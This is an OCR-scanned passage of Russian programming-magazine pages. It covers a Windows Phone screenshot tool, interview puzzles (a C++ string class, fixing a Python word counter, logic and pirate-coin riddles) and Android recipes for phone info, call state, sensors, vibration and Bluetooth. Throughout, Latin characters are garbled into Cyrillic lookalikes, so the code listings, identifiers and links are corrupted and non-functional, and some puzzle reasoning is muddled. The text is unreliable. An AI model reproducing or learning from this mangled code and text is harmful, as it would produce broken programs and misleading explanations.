по умолчанию нет функции снятия 
скриншота текущего изображения 
экрана (а-ля ргіпізсгееп). Вполне 
реально разработать такую фичу само- 
стоятельно, тем более что я не обнару- 
жил бесплатных тулз подобного рода 
Иаркетплейсе. Однако под конец 
татьи разрабатывать ее мне было 
е^нь, поэтому я продолжил поиски. 



Забавно, но решение было найдено 
не в Маркетплейсе, а на сайте неза- 
висимого сообщества разработчи- 
ков ПО для мобильных технологий. 

И находится оно по адресу: .. . і , 
- ■сот/зЬоѵѵ 'ЬгеасІ. 

13 . Так как это приложе- 

ние (Зсгееп Саріигег) расположено 
не в Маркете, надо скачать запако- 
ванный ХАР-файл и развернуть его 
на смартфоне с помощью утилиты 
Арріісаііоп Оеріоутепі, входящей в со- 
став 50К (рис. 4). 

Чтобы воспользоваться функцио- 
нальностью Зсгееп Саріигег, достаточ- 
но выполнить его и запустить задачу 
захвата изображения через нажатие 
кнопки «Зіагі Саріиге Тазк». В резуль- 
тате на выполнение запустится фоно- 
вый поток. Он будет ожидать нажатия 
аппаратной кнопки фотозахвата, после 
чего сделает отпечаток текущё'го со- 



держимого экрана, сохранит его в файл 
и поместит результат в папку сохра- 
ненных фотографий (к сожалению, 
только в )рд). Утила имеет страницу 
Неір, где подробно описано, как она 
работает. 



ш— 

МісгозоМ Ореп 
Зоигсе — место, 
где можно найти 
массутулз и ис- 
ходников для про- 
граммирования 
под платформы 
отМісгозоН. 



гш 




На диске находится 
финальная версия 
приложения 
РНоІоМакег. Наш 
могучий ][-проект 
готов! 



Прошлая статья 
также ждет тебя на 
нашем диске. Мы по- 
нимаем, что это бес- 
человечно— застав- 
лять тебя доставать 
ноябрьский журнал 
с антресолей. 



Рис. 4. Приложение Арріісаііоп Оеріоутепі 
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ПОДБОРКА ИНТЕРЕСНЫХ 
ЗАДАНИЙ, КОТОРЫЕ ДАЮТ 
НА СОБЕСЕДОВАНИЯХ 



Задачи 
на собеседованиях 



Задача № 1 

ІУСЛОВИЕІ 

Напишите 5ігіпд-класс, который бы имел: 

1) конструктор поумолчанию; 

2) конструктор копирования; 

3) деструктор; 

4) операторсравнения (аналогБІгсітір); 

5) конструктор, принимающий параметром массив символов; 

6) 5Ігеат«оператор. 

РЕШЕНИЕ 

Из условий очевидно, что класс должен быть написан на языке С++, 
поэтому первым делом кодим интерфейс. 

Описание класса Му5ѣгіп§ 

#іпс1исіе <І05І:геат> 

Му51:гіп§ { 

риЫіс : 



ОТ РЕДАКЦИИ 



Мы немного меняем форматрубрики, поэтому сегодня мы публикуем 
только правильные ответы на задачки из прошлого номера. Новая 
партия интересных задачек появится только в следующем. Потерпи 
месяцок, дождисьокончания нашей небольшой реформы! 



// конструктор по умолчанию 

Му$1:гіп^(ѵоісІ) : 

// 2^ конструктор копирования 

Мѵ$1:гіп^(соп5ѣ Мѵ$1:гіп^ & зѴ. 

// 5) конструктор, принимающий параме тром массив символов 
Му$1:гіп§(со п5І: сбаг сІіаг_аггау[ ] . с о зііе); 

// 3) деструктор 

~Мѵ51:гіп^(ѵоісІ^ ; 

// 4) оператор сравнения 

Ьооі орега ііог == (сопзі: Мѵ$1:гіп^ & з) опзі ; 

// б’) зіігеаш << оператор 

-Ргіе п: 5І;сІ : :о5І;геат & орегаііо г << (з іісі : :о5Іігеат & ои1:^ ^ 
СОП5І: МуБТгіп^ & зѴ. 



ргіѵаііе: сбаг * Ьи-Р-Рег_: 

зііе 1: Ьц-Р-Рег зііе ; 



Помимо требуемых в задании методов, мы определили 
еще и приватные переменные. Указатель на сЬаг будет ссылаться 
на область памяти, в которой будут храниться символы нашей 
строки, а Ьи1'1'ег_5І2е_ — размер этой области. Так как мы рабо- 
таем с динамической памятью, в деструкторе мы должны будем 
освобождать ее для предотвращения утечек. Остальные методы 
реализуются вполне заурядно. 

Реализация класса Му5-1:гіп§ 

#іпс1исІе "Му$1ігіп§. Іі" 

#іпс1исІе <1л11пс1оыз . Іі> 

Му51ігіп§: :Му51ігіп§( ): Ьи-р-Рег_(пи11р1іг) ^ 
Ьи-р-Рег_зІ 2 е_( 0 ) {} 
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Му$1:гіп§: :Мѵ$1:гі п^(соп5І: Му$1:гіп § & з) { 

ІІІ1І5 - > Ьц-р-Рег_5І2е_ = 5 . Ьи-р-Рег_5І2е_; 

- > Ьи-Р-Рег_ = » с [ - > Ьи-р-Рег_5І2е_]; 

тетсру( І5 - > Ьи■р■Рег_^ 5.Ьи-р■Рег_^ із - > <-■ 
Ьц-р-Рег БІіе ') ; 



Мѵ$1:гіп^: :Мѵ$1:гіп ^(соп5І: сііаг с Ііаг_аггаѵ[ ] ^ ^ 

СОП5І: 5І2е_1 5І2е) { 

Ьц-р-Рег_5І2е_ = 5І2Ѳ + 1: 

Ьц-р-Рег_ = пеы сІіаг[Ьи-р-Рег_5І2е_] ; 

7егоМетогѵ(Ьи-р-Рег_. Ьи-р-Рег зііе ') ; 

тетсру(Ьи-р-Рег_^ сІіаг_аггау^ зііе); 



МуБігіп^: :~Му51;гіп§( і сі) { 

і-р (Ьц-р-Рег_ != пиіірііг) сіе1е1:е[] Ьи-р-Рег_: 



Ьооі Мѵ5 1:гіп^: :орега1:ог == (сопзі: Мѵ51:гіп^ & з) сопзі: { 
і-р (Ьи-Р-Рег 5І2Ѳ != 5 . Ь и-Р-Рег зііе ') геііигп -Раізе; 



-Рог (5І2е_1: і = 0; і < Ьи- р-Рег_5І2 е_; і++) { 

і-р (Ьц-р-Рег_[і] != 5 . Ьц-р-Рег_[і] ) геііигп -РаІзе; 

і 



геііигп ігие: 



5ІІСІ: :о5Іігеат & орегаііог << (зісі : :о5Іігеат & ои1і. <-■ 

СОП5І: Мѵ51ігіп^ & 5) { 

ои1і << 5.Ьи-Р-Рег_: 

геііигп оиіі: 



Задача № 2 

УСЛОВИЕІ 

Дан код: 

#! /изг/Ьіп/руІіІіоп 

сіе1^ ІБ ІеІіІіегРсІіаг) : 

ІеІіІіегБ = ' аЬссІе1^^Іііік1тпордг5Ііиѵыхѵ2 ' . зрИііРМопе) 
І1^ БІіг(сІіаг) . 1оыег() іп ІеІіІіегБ: 
геіигп Тгие 

еІ5е: геіигп РаІБе 



сіе1^ ыс(б) : 

1 = ы = с = 0 

-Рог і іп гап^еРІепРз) ^ : 

сІіаг = б[і] 

с += 1 

І1^ поі І5_1е1і1іег(сІіаг) апсі поі (І5_1еііег(5[і-1]) ■м. 

апсі І5_1е1і1іег(і+1) апсІ (сРіаг іб <-■ 

ог сііаг ІБ ' \ : 

ы += 1 

і-р сііаг == ' \п ' : 

1 += 1 

геіигп '%сІ\1і%сІ\1і%сІ\п ' % (1^ с) 



І1^ пате == " таіп 

ішрогіі сІосІіеБІі 

сІос1іе5Іі.1іе5ІітосІ() 

Попробуйте угадать, что именно он должен делать. Найдите 
в нем максимальное количество ошибок, неаккуратностей и просто 



неизящностей. Подправьте имеющийся код до удовлетворительно- 
го, по вашему мнению, состояния. 

РЕШЕНИЕ 

При беглом просмотре кода становится понятно, что его основная 
задача — подсчет количества символов, слов и строк в пере- 
даваемой функции ѵѵс переменной. Также в модуле присутствует 
вспомогательная функция І5_1е1ег, которая, судя по всему, должна 
определять, принадлежит ли переданный ей символ к буквам 
латинского алфавита. 

Сначала займемся функцией ѵѵс. Локальные переменные 
I, ѵѵ и с обозначают соответственно количество строк (линий), слов 
и символов. Подсчет символов ведется в цикле і^ог, что нецелесо- 
образно, поскольку это значение равно значению, возвращаемо- 
му функцией Іеп. Также в цикле определяется количество слов. 
Для этого в операторе іі" проверяется текущий символ, и если 
он не является буквой или символом «-» или «\», непосредственно 
перед которым и после которого находятся буквы, то мы увеличи- 
ваем счетчик ѵѵ. 

В глаза сразу бросаются два промаха. Во-первых, следую- 
щий вызов І5_1еиег(і+1) явно ошибочен, так как в этом случае мы 
передаем функции не символ строки 5, а просто целое число. Во- 
вторых, перебор в 1"ог не учитывает возможность выхода за гра- 
ницы диапазона переменной 5 при обращении к ее элементам 
по индексу і. 

Есть и логические ошибки. Например, если в строке встреча- 
ется несколько разделительных символов, например пробелов, 
то количество слов посчитается неправильно. К неизящностям 
в этой функции можно отнести также перенос условий в опера- 
торе ветвления с помощью «\». Более удачным решением будет 
оформление условия с помощью скобок. Наконец, инициализацию 
счетчиков лучше производить по отдельности. Учитывая все это, 
получим следующий код: 

Исправленная версия функции мс 

сіе-р ысГб) : 

1 = 0 

]АІ = 0 

С = 1еп(5) 



-Рог і іп гап§е(1. с^: 



сбаг = б[і] 



І1^ ((поіі І5_1е1і1іег(сІіаг) апсі 
І5_1е1і1іег(5[і - 1])) апсі 



ПОІІ (і < с - 1 апсі 



І5_1е1і1іег(5[і - 1]^ апсі 

І5_1е1і1іег(5[і + 1]) апсі 

(сііаг ІБ ог сРіаг іб 'X'”)’)’): 
ы -н= 1 



І1^ сРіаг == ' \п ' : 
1 -н= 1 



і-р ІБ 1е1і1іег(5[с - 1]): 
ы -н= 1 



і-р ПОІІ б[с - 1] == ' \п ' : 
1 -н= 1 



і-р б[ 0] == ' \п ' : 
1 -н= 1 



геіигп '%сІ\1і%сІ\1і%сІ\п ' % (1^ ѵ^^ с) 
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Задачи на собеседованиях 



Функция І5_1еиег также содержит ошибки. Прежде всего, 
проблема в неправильном формировании строки с символами 
латинского алфавита. Код в задании создаст Іізі, причем из двух 
элементов, вследствие чего оператор іп будет работать не так, 
как мы этого ожидаем. Также, передавая очередной символ 
в І5_1еиег, не надо оборачивать его функцией зіг, а тело блока еізе 
должно быть на следующей строке после условного оператора. 

С учетом всего этого получается: 

Исправленная версия функции І5_1е'Ь'Ьег 

сіе-р І5_1е1:1:ег(сііаг^ : 

1е1:1:ег5 = ' аЬссІе-Р^ІііікІтпордгзІіиѵыхѵг ' 

і-р сбаг . ІоыегП іп Іеііііегз: 

геііигп Тгие 

еізе: 

геііигп Раізе 

Ну и последнее, на что следует обратить внимание, — это ис- 
пользование библиотеки босіезі для генерации ипіі-тестов из ком- 
ментариев к функциям. Дело в том, что в данном случае это вообще 
бессмысленно, поскольку в этом коде попросту нет ни одного 
комментария, который бы мог использоваться модулем босІезТ 
Соответветственно, от этого куска можно отказаться совершенно 
безболезненно. 

Задача № 3 

ІУСЛОВИЕІ 

Если лягушонок зеленый, то он веселый. Если лягушонок груст- 
ный, то он сидит на берегу. Все лягушата либо зеленые, либо 
пестренькие. Если лягушонок пестренький, то он плавает в воде. 
Тогда обязательно: 

1) все лягушата плаваютв воде; 

2) на берегутолько грустные лягушата; 

3) вселягушата — веселые; 

4) все веселыелягушата — зеленые; 

5) вселягушата — грустные; 

6) если лягушонокзеленый,тоон плавает. 

Какиеизэтихутверждений верны? 

РЕШЕНИЕ 

Для того чтобы не ломать себе мозг долгими логическими 
выкладками, воспользуемся наглядным методом решения — 
кругами Эйлера. Круги Эйлера — это геометрическая схема, 
с помощью которой можно изобразить отношения между под- 
множествами. 

Из получившейся схемы видно, что все грустные лягушата си- 
дят на берегу, все пестрые лягушата плавают в воде и все зеленые 
лягушата — веселые. Также получается, что все лягушата — либо 
зеленые, либо пестрые. 

Теперь можно по очереди примерять на рисунок каждое пред- 
положение. Первый пункт оказывается неверным, поскольку 
кругзеленых лягушат пересекается с берегом. Точнее, он может 
пересекаться, ничто ему не мешает это сделать. Круги Эйлера 
расположены так, чтобы не противоречить начальным условиям, 
но и не ограничивать себя. 

Предположить, что на берегу остались только грустные лягуша- 
та, тоже нельзя, ведь желтый круг пересекает коричневый. А вот 
третье утверждение оказывается правильным. Мы никак не можем 
заставить круг пестрых лягушат пересечься с кругом грустных, 
поскольку оба этих множества находятся в непересекающихся 
надмножествах: «сидят на берегу» и «плавают в воде». Все после- 
дующие утверждения тоже оказываются некорректны. С помощью 
таких построений мы получаем, что обязательным является лишь 
одно условие — все лягушата веселые. 



Задача № 4 

УСЛОВИЕІ 

Пять пиратов на острове должны разделить между собой сотню 
золотых монет. Они делят свою добычу так: старший пират пред- 
лагает, как делить добычу, а потом каждый голосует, соглашаясь 
с его предложением или нет. Если по меньшей мере половина 
пиратов проголосует «за», они поделят монеты так, как пред- 
ложил старший пират, если же нет — его убивают и все начинают 
сначала. Самый старший пират (из тех, кто выжил) предлагает но- 
вый план, за него голосуют по тем же правилам, а потом или делят 
добычу, или убивают старшего пирата. Так продолжается до тех 
пор, пока какой-то план не будет принят. Допустим, ты — старший 
пират. Как ты предложишь разделить добычу? Все другие пираты 
жадные, мыслят очень логично, и все хотят жить. 

РЕШЕНИЕ 

Для решения данной задачи надо сначала определиться с не- 
которыми недосказанностями в условии. Поскольку наши пираты 
крайне логичны, то очевидно, что инстинкт самосохранения у них 
развит сильнее, чем чувство жадности. Это очень важный момент, 
который позволит тебе как старшему пирату наиболее рацио- 
нально распределить добычу. 

Начнем с конца. Первым делом пронумеруем пиратов от 1 
до 5, где пират № 1 самый младший, а № 5 — это ты. Очевидно, 
что если первый и второй пираты останутся наедине, то второй 
заберет себе все 100 золотых, поскольку его первый голос будет 
той необходимой половиной для принятия плана. Зная это, третий 
бандит спокойно может дать один золотой пирату № 4, который 
просто прыгает от счастья, так как это лучшее, на что он мог рас- 
считывать. 

Четвертому пирату нужно заполучить хотя бы один голос 
за свой план дележки, и он, зная, что в случае его смерти коллега 
№ 2 останется ни с чем, предлагает ему 1 монету, оставляя себе 
99. А тебе, как пятому и самому старшему пирату, нужно перема- 
нить на свою сторону целых двух твоих «товарищей». И, учитывая 
задумку распределения добычи четвертого бандита, по которой 
пираты № 3 и 1 останутся ни с чем, ты предлагаешь им по монете, 
обеспечивая себе таким образом нужное количество голосов. Ко- 
нечно, ты бы мог лишить золотого первого или третьего бандита 
и дать его пирату № 2, но в этом случае его поведение было бы 
неопределенным, поскольку если бы ты умер, то он бы все равно 
получил свой золотой, а следовательно, он мог бы воспользо- 
ваться этим шансом для сведения личных счетов с тобой. ^ 
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ШЕСТЬ ПОЛЕЗНЫХ 
РЕЦЕПТОВ ПРОГРАММЕРАМ 



В этой статье мы рассмотрим шесть полезных рецептов, которые приго- 
дятся практически любому Апсігоісі-программисту. Сразу скажу: рецепты 
рассчитаны на то, что читатель уже знаком с разработкой приложений для 
АпсІгоісІ. Азов здесь не будет. Все рецепты написаны на ^аѵа, а сами проек- 
ты создаются в Есіірзе. 



1 ПОЛУЧЕНИЕ ИНФОРМАЦИИ 

I О ТЕЛЕФОНЕ ^ 

Класс ТеІерЬопуМападег можно использовать 
РЕЦЕПТ получения информации о телефоне, опреде- 

ления его состояния и набора номера абонента. 

В первом рецепте мы поговорим о получении 
информации отелефоне. 

Первым делом создаем проект приложения по умолчанию (пусть 
наше приложение будет называться ТМ). В файл манифеста нужно 
добавить следующую строку: 

<и5е5-регтІ55Іоп апсігоісі : пате=.м 

"апсігоісі . регтІББІоп . КЕАО_РНОМЕ_5ТАТЕ" /> 

Файл разметки тоже практически будет без изменения. Мы 
добавим лишь свойство ісі для элемента ТехіѴіеѵѵ. Файл разметки 
приведен в листинге 1. 

Листинг 1. Файл разметки ТМ/гез/Іауоиѣ/таіп.хтІ 

<?хт1 ѵег5Іоп="1.0" епсосІіп§="и1:-Р-8" ?> 

<ІіпеагІауои1: хтіпз : апсІгоісІ="ІтІ:1:р://5СІіета5 . апсігоісі . сот/ 

арк/гез/а п сігоісі" 

апсігоісі :огіеп1;а1:іоп="ѵег1:іса1" 

апсігоісі : 1аѵои1:_ыісІ1:Іі="1і11_рагеп1:" 

апсігоісі : 1ауои1;_Ііеі§ІтІ;="1і11_рагеп1;" > 

<Тех1;Ѵіеы апсігоісі : ісІ="@+ісІ/іп-Ро" 
апсігоісі : 1ауои1:_ѵ\/ісІ1:Іі="1і11_рагеп1:" 
апсігоісі : 1ауои1:_Ііеі§ІтІ:="ыгар_соп1:еп1:" 
апсігоісі :1;ех1:="@5І;гіп§/Ііе11о" /> 

</ІіпеагІаѵои1:> 

После создания файла разметки можно приступить к напи- 
санию кода. Примерный код см. в листинге 2. Полный код при- 
ложения ты найдешь на компакт-диске (такое решение было 
принято, дабы не растягивать текст статьи) в файле ТМАсІіѵіІу. 



)аѵа. Думаю, код достаточно закомментирован и не нуждается 
в дополнительных комментариях. Мы создаем экземпляр класса 
ТеІерЬопуМападег и «вытягиваем» из него полезную информацию. 

Листинг 2 , Фрагмент кода приложения 

$1:гіп^ ЕОІ = "\п" : 

// Находим тексто вую о блас ть в раз метке 
іп-Ро =(Тех1;Ѵіеѵ\/) бпсІѴіеыВуІсІ(К. ісІ . іп-Ро) ; 

// Создаем объект іт для получения информации о телефоне 
іт = (Те1ерРіопуМапа§ег)§е1;5у5І;ет5егѵісе(ТЕІЕРН0МУ_5ЕКѴІСЕ); 

// Буфер строк 

Бігіп^ВиіІсІег зЬ = пеы Бігіп^ВиіІсІегП ; 

// Общая и нформация об у стройст ве 
зЬ. аррепсІ Р "Общая информация : \п\п" ) ; 

5Ь.аррепсІ("І0 устройства <-■ 

аррепсі(1:т.§е1:0еѵісеісі( ) ) . аррепсІР ЕОІ^ : 

зЬ.аррепсІГ'Версия ПО: 

аррепсІ(1:т.^е1:Реѵісе5о-Рі:ыагеѴег5ІопП ) .аррепсКЕОП ; 

5Ь.аррепсІ( "Номер телефона: "). ^ 
аррепсІ(1;т.§е1;Ііпе1НитЬег()) .аррепсІ(ЕОІ) ; 

// Выводим содержимое буфера строк в текстовую область 

іп-Ро. 5е1:Тех1;(5Ь.1;о51:гіп§( ) ) ; 

Получить информацию об операторе, выдавшем БІМ-карту, 
можно так: 

• Іт.деіВіппСоипІгуІзоО — кодстраны (І50); 

• Іт.деіВіппОрегаІогО — краткое название оператора; 

• Іт.деіЗіппОрегаІогМаппеО — название оператора; 

• Іт.деі5іпп5егіаІМиппЬег() — серийный номер 5ІМ -карты. 

Информация о текущей сети: 

• Іт.деШеІѵѵогкОрегаІогО — названиетекущегооператора сети 
(оператор, выдавший 51М-карту, может отличаться оттекущего 
оператора, когда пользователь находится в роуминге); 
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• Іт.деШеІѵѵогкОрегаІогМаппеО — полное названиеоператора сети; 

• Іт.деШеІѵѵогкСоипІгуІзоО — страна оператора сети (по сути, 
этострана, в которой вы находитесь, — когда вы в роуминге, 
это значение отличается от значения Іт.деіЗіппСоипІгуІзоО). 

Также можно получить другую информацию: 

• Іпп.деіЗиЬзсгіЬегІсіО — I О абонента; 

• Іт.деіѴоісеМаіІАІрЬаТадО — альфа-тегголосовй почты; 

• Іт.деіѴоісеМаіІМиппЬегО — номер голосового почтового ящика. 

НАБОР НОМЁ^ 

Теперь разберемся, как набрать номер телефона. 
Чтобы получить разрешение на набор номера, до- 
бавляем в файл манифеста такую строку: 



<и5е5-регтІ55Іоп апсігоісі: пате=.м 

"апсігоісі . регтіззіоп . СА11_РНОМЕ" /> 

Затем ты можешь использовать одну из двух операций — или 
АСТ10М_САП или АСТ10М_01А1. Первая операция отобразит 
диалог с набираемым номером (как обычно при наборе номера 
вручную), вторая операция наберет номер без показа какого-либо 
интерфейса пользователя. 

з1:аг1:Ас1:іѵі1:у(пеы Іп1:еп1:(Іп1:еп1: .АСТІОМ САІІ . 

Цгі.раг5е("1:е1:номер"))) ; 

з1:аг1:Ас1:іѵі1: у(пеы Іп1;еп1;(Іп1;еп1; . АСТIОN_^IА^^ ^ 
и г і . р а г 5 е ( " 1; е 1 : н оме р " ) ) ) ; 

Как видишь, ничего сложного, и можно сразуже перейти ктре- 
тьему рецепту, где мы определим номер входящего звонка. 

ПОЛУЧЕНИЕ информации! 
о состоянии ТЕЛЕФОНАГ 

Отслеживать состояние телефона в ожидании 
определенного события можно с помощью 
«прослушек», которые подробно описаны 
на странице руководства разработчика 
Апсігоісі: ЫПу/ОбЬбЬЗ . Мы рассмотрим только наиболее часто 
используемую «прослушку» РЬопе5іаІеизІепег.Ы5ТЕМ_ 
САП_5ТАТЕ, позволяющую определить номер входящего 
звонка (и, соответственно, выполнить определенные действия 
при входящем звонке). Возможны три состояния звонка: 

• САЕЕ_5ТАТЕ_ЮЕЕ — напринимается входящийзвоноки неуста- 
навливается исходящий; 

• САЕЕ_5ТАТЕ_Р1М61М6 — устройство принимает входящий звонок; 

• САЕЕ_5ТАТЕ_0РРН00К — пользователь говорит по телефону. 
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Рис. 1. Редактирование файла манифеста 



іп-Ро = (ТехІіѴіеы) бпсІѴіеѵ\/ВуІсІ(К.ісІ.іп-Ро); 

// Созд аем объект кла сса ТеІер ІіопѵМапа^ег 

= (ТеІ ерІіопуМапа^ег) §е1:$у5І:ет$егѵісе4-< 

(ТЕІЕРНОМУ 5ЕКѴІСЕѴ. 

// Устанавливаем «прослушку» для ІІ5ТЕМСА115ТАТЕ 

1:т. ІізІіепГпеы ТеІІізІіепегП . <-■ 

РІіопеЗ^а^еІіз^епег . ІІ5ТЕІМ СА115ТАТЕ) : 

Те11І5І;епег ехііепсіз РІіопе51;а1;еІІ5І;епег X 

опСа1151;а1:еСІіап§есІ( 51:а1;е^ <-■ 

51:гіп^ іпсошіп^МитЬег) { 

зирег .опСа1151:а1:еСІіап^есІ(5І:а1:е. іпсотіп^МишЬег) ; 

5ЫІІІСІ1 (з1:а1:е) { 

сазе ТеІ ерІіопѵМапа^ег . САІІ_5ТАТЕ_ІОІЕ : 

іп-Ро. зе1:Тех1:("ІРІЕ"^ ; 

Ьгеак: 

сазе ТеІерІіопѵМапа^ег .СА115ТАТЕ ОРРНООК: 

іп-Ро.5е1:Тех1:("ОРРНООК. Вход, номер:" + ^ 

іпсотіп^МишЬег^ : 

Ьгеак; 

сазе ТеІерЬ опѵМапа^ег .СА115ТАТЕ КІМ6ІМ6: 

іп-Ро .$е1:Т ех1:("КІМ6ІМ6. Вход, но мер: " + <-■ 

іпсошіп^МипіЬег) ; 

Ьгеак; 

сІе-Раи11:: 

Ьгеак: 

} // зыіІісЬ 

} // опСа1151:а1:еСЬа п§;есІ 

} 



Наше приложение выводит в текстовую область (ТехіѴіеѵѵ) 
с именем іпі'о состояние телефона и номер входящего звонка, если 
таковой имеется. 



Сейчас мы напишем программу, которая реагирует на все 
три состояния звонка и ничего не делает, — действия ты опреде- 
лишь сам. Такое решение было принято, дабы не захламлять код. 

А что делать, решай сам — можешь, например, вывести уведом- 
ление при получении звонка. Чтобы задать собственные действия 
при изменении состояния звонка, мы переопределим метод 
опСаІІ5іаІеСЬапдесІ(). 

Прежде чем приступить к написанию кода, добавляем в файл 
манифеста следующую строку: 

<и5е5-регтІ55Іоп апсігоісі: пате=<-‘ 

"апсігоісі . регтіззіоп . КЕАО_РНОМЕ_5ТАТЕ" /> 

Файл разметки будет таким же, как у приложения ТМ (см. 
листинг 1). Фрагмент кода приложения представлен в листинге 3. 
Полный код приложения ты найдешь на ОѴО в файле СаІІ5іаІе.)аѵа. 

Листинг 3. Реакция на изменение состояния звонка 

ітрогі; апсігоісі .ІіеІерЬопу. РЬопе51:а1;еІІ5І;епег; 
ітрогі апсігоісі .1:е1ерЬопу.Те1ерЬопуМапа§ег; 



4 [РАБОТАЕМ С СЕНСОРАМИ 

Современные мобилки оснащены всевозможными 
датчиками (сенсорами) — камерой, акселероме- 
РЕЦЕПТ тром, датчиком температуры и прочим. 

С! Наиболее популярна из сенсоров камера, 

но управление ею заслуживает отдельного раз- 
говора — мы обязательно поговорим об этом, но чуть позже. А пока 
рассмотрим другие датчики, которыми может быть оснащено 
мобильное устройство: 

• ТУРЕ_АССЕЕЕРОМЕТЕР — акселерометр, позволяетопределить 
ускорение мобильного устройство. Таким датчиком оснащаются 
не все смартфоны, преимущественно акселерометр можно найти 
на смартфонах, оснащенныхфункцией СР5 (хотя это необязатель- 
но — все зависит от производителя устройства). 

• ТУРЕ_Ы0НТ — датчик света. Очень полезная штука: сего помо- 
щью можешьуправлять подсветкой дисплея, например увеличить 
яркость, когда сталотемно. В конечном итогедатчикпомогает 
экономить за ряд аккумулятора. 

• ТУРЕ_ТЕМРЕРАТОРЕ — температурный датчик. 

• ТУРЕ_РРЕ550РЕ — датчик атмосферного давления. 
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в твоем устройстве могут быть дополнительные датчики. Ис- 
пользуй метод деі5еп50гЫ5і() класса ВепзогМападег, чтобы полу- 
чить список датчиков. Сейчас мы рассмотрим чтение показаний 
датчика температуры. Примеры чтения других датчиков можно 
найти в документации разработчика АпсІгоісІ. 

Для чтения датчиков подключаем следующие пакеты: 

ітрогі; апсігоісі . багсІыаге.ЗепБог; 

ітрогі; апсігоісі . ІіагсІыаге.5еп50гЕѵеп1;; 

ітрогі; апсігоісі . ІіагсІыаге.5еп50гЕѵеп1;ІІ5І;епег; 

ітрогі апсігоісі . ІіагсІыаге.5еп50гМападег: 

Далее определить объекты класса ВепзогМападег: 

ргіѵаіе З епБогМапа^ег туМапа§ег = пиіі; 

_туМапа§ег = (5еп50гМапа§ег)§е1;5у5І;ет5егѵісе<-‘ 
(5ЕМ50К_5ЕКѴІСЕ); 

тѵМапа^ег. ге^І5ІіегІІ5І:епег(1:етр5еп50гІІ5І:епег. 

туМапа§ег . §е1;0е-раи11;5еп5ог(5еп5ог . ТУРЕ_ТЕМРЕКАТІІКЕ) ^ 
5еп50гМапа§ег . 5ЕМ50К_0ЕІАУ_6АМЕ) ; 



Метод сапсеК) используется для преждевременной отмены 
вибрации (например, если ты установил вибрацию три секунды, 
а пользователь отреагировал раньше): 

ѴіЬ. сапсеІП ; 



• найти доступные ВІиеІооіЬ-устройства; 

• подключиться кодномуизустройств; 

• произвести собственно обмен данными. 

В файл манифеста АпбгоісІ-приложения, использующего ВІиеІооіЬ, 
добавляем строки: 

<и5е5-регтІ55Іоп апсігоісі : пате=<-‘ 

"апсігоісі . регтІББІоп . ВШЕТООТН" /> 

<и5е5-регтІ5 5Іо п ап сіго ісі: пате=<-- 

"апсігоісі . регтІББІоп . ВШЕТООТН АРМІІМ" /> 
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ПЕРЕДАЧА ДАННЫХ ПО ВШЕТООТН 

Для передачи данных по ВІиеІооіЬ нужно: 

• включитьадаптер ВІиеІооіЬ; 



Методу гедІБІегІІБІепегО передаюттри параметра. Первый — 
название обработчика датчика температуры. В нашем случае 
это ІетрЫБІепег, который будет определен позже. Второй пара- 
метр — датчик поумолчанию, в нашем случае — датчик температу- 
ры. Третий параметр задает время обновления показаний датчика. 
Для наиболее быстрого обновления используйте 5ЕМ50Р_0Е1АУ_ 
6АМЕ, для обычного обновления — 5ЕМ50Р_0ЕЕАУ_М0РМАЕ. 

Следующий код определяет «прослушку» ІетрЫБІепег. 

Наша задача — переопределить методы опАссигасуСЬапдесіО 
и опВепБогСЬапдесіО. Первый метод нам не нужен, поэтому мы 
определим его как пустой метод. А второй метод будет устанавли- 
вать текст области іпіо (элемент ТехіѴіеѵѵ в разметке) — мы будем 
показывать температуру. 

бпаі ЗепБогЕѵепіІІБіепег іетрІІБіепег = 
пеы ЗепБогЕѵепіІІБІіепегП { 



(аЮѵеггісІе 

риЫіс ѵоісі опАссигасѵСІіап^е сІ(5еп50г бѳпбог^ 
іпі ассигасу) {} 



(аЮѵеггісІе 

рцЫіс ѴОІСІ 0п5епБ0гСІіап^есІ(5еп50гЕѵеп1: еѵепіі) { 

і-р (еуепі. БѳпБог.^еіТуреП == -м 
ЗепБОГ. ТУРЕТЕМРЕКАТиКЕ) { 

іп-Ро. БеіТ ехіР "Температура : " + еѵепі; . ѵа1ие5[0] ) ; 

} 

} 



Дополнительную информацию можно получить по адресу: ЬіЫѵ/ЬЕ]Хд 

ВКЛЮЧАЕМ ВИБРОЗВОНОК 

Привлечь внимание к уведомлению или диа- 



В пакете апсігоісі. ЫиеІооіЬ определены следующие классы: 

• ВІиеІооіЬАсІарІег — представляетинтерфейсобнаружения иуста- 
новки ВІиеІооіЬ-соединений. 

• ВІиеІооіЬСІазБ — описываетобщиехарактеристики ВІиеІооіЬ- 
устройства. 

• ВІиеІооіЬОеѵісе — представляетудаленное ВІиеІооіЬ-устройство. 

• ВІиеІооіЬВоскеІ — сокетилиточка соединения для данных, 
которыми наша система обменивается с другим ВІиеІооіЬ- 
устройством. 

• ВІие1ооіЬ5егѵег5оске1 — сокет для прослушивания входящих 
ВІиеІооіЬ-соединений. 

ВКЛЮЧЕНИЕ ВШЕТООТН-АДАПТЕРА 

Первым делом получаем адаптер по умолчанию: 

ВІиеіооіІіАсІарІіег туВІиеіооІіІі = 

ВІиеіооіРіАсІаріег . §е1;Ое-Раи11;АсІар1;ег( ) ; 

Активировать ВІиеІооіЬ-адаптер можно таким образом: 

// Если Віиеіооііі выключен 

і-р ( !тѵВ1ие1:оо1:Іі. ізЕпаЫесІП ) { 

// Создаем действие АСТІ0М КЕ01ІЕ5Т ЕМАВІЕ . которое 

// з апрашив ает включение ада п тера 

Іпіепі; еіпіепі; = ^ 

пеы ІпіепіРВІиеіооіІіАсІаріе г.АСТІОМ КЕОиЕЗТ ЕМ АВІЕ) ; 

// Выполняем действие 

5І:аг1:Ас1:іѵі1:у(еІп1:еп1:) ; 

} 

ОБНАРУЖЕНИЕ УСТРОЙСТВ ПО СОСЕДСТВУ 

Для обнаружения устройств используется код из листинга 4. Обна- 
руженные устройства выводятся в журнал с помощью Еод.сіО. 



ѴУ логу программы можно с помощью вибрации. 

РЕЦЕПТ управления виброзвонком добавляем в файл 

манифеста следующее разрешение: 

<и5е5-регтІ55Іоп апсігоісі : пате=<м 
"апсігоісі . регтІББІоп .VI ВКАТЕ" /> 

Далее используем класс ѴіЬгаІогтак: 

ѴіЬгаіог ѴІЬ = (ѴіЬгаіог) ^еіЗуБіетЗегѵісе^-і 
(Соп1;ех1;.ѴІВКАТОК_5ЕКѴІСЕ); 

ѴІЬ. ѵіЬга1;е(3000) ; // Вибрировать три секунды 



Листинг 4. Поиск Віиеіооііі -устройств 

ітрогі апсігоісі. иііі. Іо§; . . . 

ргіѵаіе бп аі ВгоасІсазіКесеіѵег туКесеіуег = 

